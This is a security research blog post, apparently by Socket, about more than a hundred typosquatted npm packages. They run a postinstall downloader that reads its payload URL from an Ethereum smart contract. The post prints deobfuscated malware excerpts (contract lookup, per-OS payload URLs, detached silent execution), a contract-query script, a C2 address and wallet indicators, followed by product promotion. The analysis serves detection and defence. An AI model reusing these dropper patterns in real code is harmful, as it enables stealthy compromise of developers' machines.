Kush Pandya
Philipp Burckhardt
Kirill Boychenko
Orlando Barrera
October 31, 2024
Supply chain attacks are evolving. The Socket research team has uncovered a massive malware campaign that uses Ethereum smart contracts to control its operations — making it nearly impossible to shut down through traditional means. Instead of using conventional command and control servers that can be blocked or taken offline, these attackers are leveraging blockchain's decentralized architecture to maintain persistent control over their malware.
This technique represents a significant evolution in supply chain attacks targeting the npm ecosystem. In 2023, similar supply chain attacks impacted over 1.6 million downloads, and this new blockchain-based approach demonstrates how attackers continue to innovate their methodologies to evade detection and maintain persistence.
Our investigation began last week with the discovery of a suspicious package named "haski" (version 2.8.5) - a typosquat targeting husky, the popular git hooks library. This malicious package attempted to exploit husky's reputation by mimicking its name while containing obfuscated malicious code linked to an Ethereum wallet address.
The malicious code was designed to execute automatically upon installation through a postinstall script defined in the package's package.json file. The postinstall script is a lifecycle hook in npm that runs automatically after the package is installed. By leveraging this, the attackers ensure that their malicious code is executed without any additional action from the user.
This initial finding proved to be the tip of the iceberg.
Over the last twenty-four hours, our AI scanner detected a sudden wave of malware packages flooding the npm ecosystem, all exhibiting the same execution flow and identical blockchain-based characteristics. This onslaught suggests a carefully plotted attack, with the initial "haski" package potentially serving as a test run.
Further investigation revealed dozens of packages, all following a consistent pattern:
_0x prefixUpon deobfuscation, we confirmed these packages were part of a coordinated campaign, each containing a sophisticated multi-stage malware downloader using Ethereum smart contracts for C2 communication. The attack infrastructure was consistent across all packages, using the same Ethereum contract address and wallet for C2 communication.
Each of the more than one hundred malware packages was published by a distinct, fake maintainer likely auto-generated through a tool like Faker. These profiles use randomized usernames and plausible email addresses with common names and random digits, such as upj4cimrds1fo with email address KarenCampbelljzm2902@gmail.com.
Some notable patterns across the discovered packages include:
This evolution from a targeted typosquat of a popular package to a broader automated campaign demonstrates the threat actors' shift toward more sophisticated and scalable attack methodologies.
The malware operates in three distinct stages:
Blockchain-Based C2 Retrieval
const contractAddress = '0xa1b40044EBc2794f207D45143Bd82a1B86156c6b';
const WalletOwner = '0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84';
const abi = ['function getString(address account) public view returns (string)'];
The malware queries a specific Ethereum contract to retrieve the payload URL, making traditional C2 blocking ineffective.
Through dynamic analysis of the contract interactions, we developed a script to query the malicious smart contract directly:
const { ethers } = require("ethers");
const provider = ethers.getDefaultProvider("mainnet");
const abi = ["function getString(address account) public view returns (string)"];
const contract = new ethers.Contract("0xa1b40044eBc2794f2707d45143Bd82a1B86156c6b", abi, provider);
async function getUrl() {
try {
const address = ethers.utils.getAddress("0x522212c293a21DBCA7AFD01aC6bFAC7175D590A84");
const baseUrl = await contract.getString(address);
console.log("Base URL:", baseUrl);
} catch (error) {
console.error("Error:", error);
}
}
getUrl();The contract query returned a C2 server address operating at http://45[.]125[.]67[.]172:1337. The use of a non-standard port (1337), combined with blockchain-based command retrieval, indicates a deliberate effort to evade standard detection mechanisms and to create a resilient and hard-to-disrupt C2 infrastructure:
Key findings from the C2 analysis:
Cross-Platform Payload Distribution
const getDownloadUrl = (baseUrl) => {
const platform = os.platform();
switch (platform) {
case 'win32':
return baseUrl + '/node-win.exe';
case 'linux':
return baseUrl + '/node-linux';
case 'darwin':
return baseUrl + '/node-macos';
}
};
The code demonstrates a targeted platform detection and targeted payload delivery for Windows, Linux, and MacOS systems.
Stealthy Execution
const executeFileInBackground = async (filepath) => {
const process = spawn(filepath, [], {
detached: true,
stdio: 'ignore'
});
process.unref();
};The malware executes the downloaded payload with multiple stealth mechanisms:
The funding address 0x4E5B2e1dc63F6b91cb6Cd759936495434C7e972F appears to have a history of involvement in several crypto scams and controversial campaigns, including an incident where approximately $26 million was reportedly drained from BTC and ETH wallets and a portion deposited into this address.
The flow begins with the address (0x4E5B2...), which enables anonymous transactions, passing funds to an intermediary address (0x46b0f9bA...) for further separation. The funds then reach the primary wallet (0x52221c2...), the main operational hub that frequently interacts with a suspicious contract (0xa1b400...), using the Set String method to store or update data. This contract likely acts as a C2 node, allowing the attacker to maintain control over malware deployments securely and persistently through the blockchain. The transaction chain is carefully structured with low-value transactions to avoid detection, demonstrating a novel use of blockchain technology for decentralized and resilient C2 infrastructure.
During the analysis, the Socket Threat Research Team identified multiple instances of Russian language usage within the malicious packages codebase. The code contains error messages written in Russian, which are used in exception handling and logging.
console.error('Ошибка установки:', error);
Translation: “Installation error:”. This string is logged when an error occurs during the installation or execution of the downloaded file.
console.error('Ошибка при получении IP адреса:', error);Translation: “Error retrieving IP address:”. This string is logged when there is an error while fetching data from the Ethereum smart contract.
The inclusion of Russian language elements in the malicious code suggests the attacker might be proficient in Russian, but this should be interpreted cautiously due to the possibility of deliberate misattribution or code reuse. Language usage is just one factor among many, and further analysis is necessary to conclusively determine the attacker's identity and origin.
This attack vector is particularly concerning for several reasons:
The discovery of this blockchain-based malware campaign demonstrates the evolving sophistication of supply chain attacks in the npm ecosystem. Threat actors are now leveraging smart contracts for command and control, making traditional security measures ineffective. This campaign, spanning multiple packages like "ethsg-util", "web3-toekn", and "ethblk-tracker", showcases how attackers can distribute advanced malware through seemingly legitimate packages.
Traditional code review and manual security checks are insufficient against these modern threats. The malware's use of blockchain for C2, intentional obfuscation, and cross-platform payload delivery demands a more robust, automated approach to package security. Socket's free GitHub app provides this crucial layer of protection by:
Install Socket's free GitHub app today and get immediate protection against advanced supply chain attacks.
This discovery marks a significant evolution in supply chain attacks, demonstrating how attackers are leveraging blockchain technology to create more resilient malware infrastructure. The combination of blockchain-based C2, cross-platform targeting, and stealth mechanisms makes this a threat that requires enhanced security measures.
To protect your organization from similar threats, consider implementing automated dependency scanning with Socket's GitHub integration. Our tools can help identify suspicious packages before they enter your supply chain, providing early warning against emerging threats like this blockchain-based attack vector.
This malware campaign is ongoing and we added more than 100 malicious packages to the IOCs. These include notable typosquats pretierr (typosquat for Prettier) and neextjs (targeting next).
Over the weekend, we have observed more malicious packages being published as part of this campaign, targeting a variety widely used legitimate npm packages such as nodemailer or axios.
0xa1b40044EBc2794f207D45143Bd82a1B86156c6b0x52221c293a21D8CA7AFD01Ac6bFAC7175D590A84node-win.exenode-linuxnode-macosSubscribe to our newsletter
Get notified when we publish new security blog posts!
Try it now
Research
/Security News
Malicious Rust crate evm-units disguised as an EVM version helper downloads and silently executes OS-specific payloads likely aimed at crypto theft.
Security News
Socket CEO Feross Aboukhadijeh shares lessons from scaling a developer security startup to 10,000+ organizations in this founder interview.
Research
/Security News
Another wave of Shai-Hulud campaign has hit npm with more than 500 packages and 700+ versions affected.